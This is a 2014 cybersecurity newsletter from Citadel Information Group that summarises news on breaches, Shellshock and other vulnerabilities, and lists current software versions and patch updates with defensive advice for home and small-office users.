Monday, October 06, 2014

Cyber Security News, Education and Vulnerability Patch Report for the Week of October 6, 2014


From our friends at Citadel Information Group

Cyber Crime

JPMorgan Chase Hacking Affects 76 Million Households: A cyberattack this summer on JPMorgan Chase compromised the accounts of 76 million households and seven million small businesses, a tally that dwarfs previous estimates by the bank and puts the intrusion among the largest ever. The New York Times, October 2, 2014
U.S. retail chains and banks no match for new breed of hackers: Since December, a rash of hacks have hit retailers, a major bank, and even a gourmet sandwich chain. Target, Home Depot, JP Morgan Chase, and Jimmy John had complex malware unleashed into their systems. Over 100 million customers saw their credit cards boosted by cyber thieves, along with home addresses, Social Security numbers, and other personal data. Much of the card information ended up for sale on cyber black markets like VentureBeat, September 29, 2014
Supervalu announces another possible data breach, finds malware on point-of-sale systems: The grocery store chain says it discovered malware installed on some of its point-of-sale systems a little over a month after announcing its computer systems were hacked. Fortune, September 29, 2014
Signature Systems Breach Expands: Signature Systems Inc., the point-of-sale vendor blamed for a credit and debit card breach involving some 216 Jimmy John’s sandwich shop locations, now says the breach also may have jeopardized customer card numbers at nearly 100 other independent restaurants across the country that use its products. KrebsOnSecurity, September 26, 2014

Financial Cyber Security

Microsoft partners with financial services industry to fight cyber crime: Microsoft is to share cyber threat intelligence with the Financial Services Information Sharing and Analysis Center (FS-ISAC) to help fight cyber crime. ComputerWeekly, September 30, 2014

Identity Theft

We Take Your Privacy and Security. Seriously: “Please note that [COMPANY NAME] takes the security of your personal data very seriously.” If you’ve been on the Internet for any length of time, chances are very good that you’ve received at least one breach notification email or letter that includes some version of this obligatory line. But as far as lines go, this one is about as convincing as the classic break-up line, “It’s not you, it’s me.” KrebsOnSecurity September 29, 2014

Cyber Warning

Serious Hypervisor Bug Fix Causes Unexpected Cloud Downtime: The Xen Project published a security advisory yesterday about a critical vulnerability in its virtual machine and hypervisor systems that could expose public cloud servers to attacks capable of crashing host machines and even stealing small amounts of random data. The fix was made available under embargo to certain cloud service providers last week, leading to downtime as some of those providers performed emergency maintenance to resolve the vulnerability over the weekend. ThreatPost, October 2, 2014
Release of Attack Code Raises Stakes for USB Security: Rarely in security is anything an absolute, but in the case of the BadUSB research that emerged during this year’s Black Hat conference, phrases such as “completely compromised” and “undetectable” paint a grim picture for the security of devices that communicate over USB. ThreatPost, October 2, 2014
Voice Hackers Will Soon Be Talking Their Way Into Your Technology: Voice-activated technology is so vulnerable to attack that users should immediately disable speech recognition on all their devices, a security researcher at AVG has warned. Forbes, September 29, 2014
Security Experts Expect ‘Shellshock’ Software Bug in Bash to Be Significant: Long before the commercial success of the Internet, Brian J. Fox invented one of its most widely used tools. The New York Times, September 25, 2014

Cyber Security Management

Cyber Risk Series: Beazley Underwriter says a breach alone is not a disaster, but mishandling it is: Stan Stahl, President of Citadel Information Group, sits with Serene Davis, an Underwriter with Beazley, to discuss cyber breaches and what companies can do to protect themselves from a major loss. World Risk and Insurance News, 2014
Five Truths About Cyber Security: The average total cost of a data breach is now $3.5 million globally, a 15% rise from last year, according to a 2014 study by the Ponemon Institute. The likelihood of a company having a data breach “involving 10,000 records or more stands at 22%,” finds the same study. CFO, Septmeber 23, 2014

Cyber Security Management – Cyber Defense

WPScan Vulnerability Database a New WordPress Security Resource: WordPress’ popularity as a content management system (44 percent of CMS market share) is matched in parallel by the number of security vulnerabilities afflicting the open source platform, as well as its versatile plug-ins and themes. ThreatPost, September 29, 2014
Companies Rush to Fix Shellshock Software Bug as Hackers Launch Thousands of Attacks: A day after the Department of Homeland Security advised Internet users and corporations about a newly discovered software bug that could affect hundreds of millions of systems, hackers had already begun exploiting the bug and companies were rushing to fix the issue for their users. The New York Times, September 26, 2014

Cyber Security Management – Cyber Update

Apple Releases Patches for Shellshock Bug: Apple has released updates to insulate Mac OS X systems from the dangerous “Shellshock” bug, a pervasive vulnerability that is already being exploited in active attacks. KrebsOnSecurity, September 30, 2014

Securing the Village

FBI releases Malware Investigator portal to industry players: The FBI’s Malware Investigator portal will soon be available to security researchers, academics and businesses. ZDNet, September 30, 2014

National Cyber Security

Steptoe Cyberlaw Podcast, Episode #35: An Interview with Julian Sanchez: Our guest is Julian Sanchez, a senior fellow at the Cato Institute who studies surveillance and other issues at the intersection of technology and civil liberties. He is a founding editor of the policy blog Just Security, and recently debated another of our guests, Orin Kerr, on Apple’s recent announcement that it would no longer be able to decrypt iPhones for law enforcement. We dig into that issue in detail, asking such questions as how often encryption has actually stymied an investigation, whether “hacking” the phone is a substitute for help from the company, what this means for corporate users of iPhones, the implications for Apple (and Google) in other countries, and whether Google/Apple run a risk under current US law of lawsuits by prosecutors or by crime victims. LawFare, Septemeber 26, 2014

Cyber Security Management- Awareness

Poll: Employees Clueless About Social Engineering: Not surprisingly, our latest poll confirms that threats stemming from criminals hacking humans are all too frequently ignored. DarkReading, October 2, 2014

Cyber Insurance

Cyberinsurance Resurges In The Wake Of Mega-Breaches: Insurance policies customized for cyberattack protection are on the rise as businesses worry they could be the next Target. DarkReading, October 2, 2014

Cyber Law

Silk Road Lawyers Poke Holes in FBI’s Story: New court documents released this week by the U.S. government in its case against the alleged ringleader of the Silk Road online black market and drug bazaar suggest that the feds may have some ‘splaining to do. KrebsOnSecurity, October 2, 2014
Europe’s police need data law changes to fight cybercrime – Europol: (Reuters) – Law enforcers in Europe need greater powers to retain data for longer in order to catch cybercriminals selling discrete services that police cannot trace under existing regulations, according to a Europol report published on Monday. Reuters, September 29, 2014

Cyber Misc

FDA Releases Final Guidance on Medical Device Cybersecurity: On Wednesday, FDA released final guidance on how medical device manufacturers can better protect patient information, Clinical Innovation & Technology reports. iHealthBeat, October 2, 2014

Cyber Sunshine

ID Theft Service Customer Gets 27 Months: A Florida man was sentenced today to 27 months in prison for trying to purchase Social Security numbers and other data from an identity theft service that pulled consumer records from a subsidiary of credit bureau Experian. KrebsOnSecurity, October 1, 2014

Weekend Vulnerability and Patch Report, October 5, 2014

Important Security Updates

Apple OS X: Apple has released updates for multiple versions of OS X to fix two highly critical vulnerabilities reported in OS X Lion version 10.7.5, OS X Lion Server version 10.7.5, OS X Mountain Lion version 10.8.5, OS X Mavericks version 10.9.5. Apply OS X bash Update 1.0.
Opera: Opera has released version 24.0.1558.64 to fix moderately critical vulnerabilities. Updates are available from within the browser or from Opera’s website.
Piriform CCleaner: Piriform has released version 4.18.4844 for CCleaner. Updates are available from Piriform’s website.
Siber Systems RoboForm: Siber Systems has released version of Roboform. Updates are available from within the program, look for the “Check New Version” button on the Options menu or download from the Roboform website.

Current Software Versions

Adobe Flash [Windows 7: IE]
Adobe Flash [Windows 7: Firefox, Mozilla]
Adobe Flash [Windows 8: IE]
Adobe Flash [Macintosh OS X: Firefox, Opera, Safari]
Adobe Reader 11.0.09
Dropbox 2.10.30 [Citadel warns against relying on Dropbox security. We recommend files containing sensitive information be independently encrypted with a program like Axcrypt; encryption keys be at least 15 characters long; and the Dropbox password be at least 15 characters long and different from other passwords.]
Firefox 32.0.3
Google Chrome 37.0.2062.124
Internet Explorer 11.0.9600.17280
Java SE 7 Update 67 [Citadel recommends removing or disabling Java from your browser. Java is a major source of cyber criminal exploits. It is not needed for most internet browsing. If you have a particular web site that requires Java, Citadel recommends using a two-browser approach to minimize risk. If you normally browse the Web with Firefox, for example, disable the Java plugin in Firefox and use an alternative browser — such as Chrome, IE9, Safari, etc — with Java enabled to browse only the sites that require it.]
QuickTime 7.7.5
Safari 5.1.7 
Safari 7.1 [Mac OS X]

Newly Announced Unpatched Vulnerabilities

For an updated list of previously announced Unpatched Vulnerabilities, please see the resources section of Citadel’s website.

For Your IT Department

Cisco Multiple Products: Secunia reports Cisco has released updates for IOS, IOS XE, WebEx Meetings Server, TelePresence IP Gateway Series, TelePresence ISDN, WAAS, and others. Apply available updates. Secunia reports unpatched vulnerabilities in IOS XE, ACE Application Control Engine Appliance 3.x, Aggregation Services Routers (ASR), ASA 5500 Series Adaptive Security Appliances, Content Delivery Engine Series, Digital Media Manager 5.x, Edge 300 Digital Media Player, Edge 340 Digital Media Player, Identity Services Engine (ISE) 1.x, Intrusion Prevention System (IPS) 7.2, IOS 15.0, IOS 15.1, IOS 15.2, IP Interoperability and Collaboration System (IPICS) Server 8.x, IP Video Phone E20, IPS 4200 Series Sensor, MDS 9000 Series, Media Experience Engine (MXE) 3000 Series, NAC Appliance 2.x, Nexus 4000 Series Switches, Nexus 5000 Series Switches, Nexus 7000 Series Switches, Nexus 9000 Series Switches, SCE 8000 Series (Service Control Engine), Secure Access Control System (ACS) 5.x, TelePresence Conductor, Telepresence Integrator C Series, TelePresence Systems (CTS), Unified Computing System (UCS) 2.x, Emergency Responder 9.x, Intelligent Automation for Cloud 4.x, Nexus 1000V 5.x, Prime Data Center Network Manager (DCNM) 7.x, Secure Access Control System (ACS) 5.x, TelePresence Manager 1.x, TelePresence Video Communication Server (VCS), UCS Central Software 3.x, Unified Communications Licensing 10.x, Unified Communications Manager 10.x, Unified Communications Manager 7.x, Unified Communications Manager 8.x, Unified Communications Manager 9.x, Unified Communications Manager IM and Presence Service 10.x, Unified Communications Manager IM and Presence Service 9.x, Unified Intelligence Center 10.x, Unity Connection 9.x. No official solution is available.
Novell Open Enterprise Server: Secunia reports Novell has released an update to Open enterprise Server to fix two highly critical vulnerabilities in Novell Open Enterprise Server 2 (OES 2) Linux Support Pack 3 and Novell Open Enterprise Server 11 (OES 11) Linux Support Pack 1. Apply updated packages via the zypper package manager.
If you are responsible for the security of your computer, Citadel’s Weekend Vulnerability and Patch Report is for you. We strongly urge you to take action to keep your workstation patched and updated.
If someone else is responsible for the security of your computer, forward our Weekend Vulnerability and Patch Report to them and follow up to make sure your computer has been patched and updated.
Vulnerability management is a key element of cyber security management. Cyber criminals take over user computers by writing computer programs that “exploit” vulnerabilities in operating systems (Windows, Apple OS, etc) and application programs (Adobe Acrobat, Office, Flash, Java, etc). When software companies find a vulnerability, they usually issue an update patch to fix the code running in their customer’s computers.
Citadel publishes our Weekend Vulnerability and Patch Report to alert readers to some of the week’s important updates and vulnerabilities. Our focus is on software typically found in the small or home office (SOHO) or that users are likely to have on their home computer. The report is not intended to be a thorough listing of updates and vulnerabilities.
Copyright © 2014 Citadel Information Group. All rights reserved.'s Security Recruiter Blog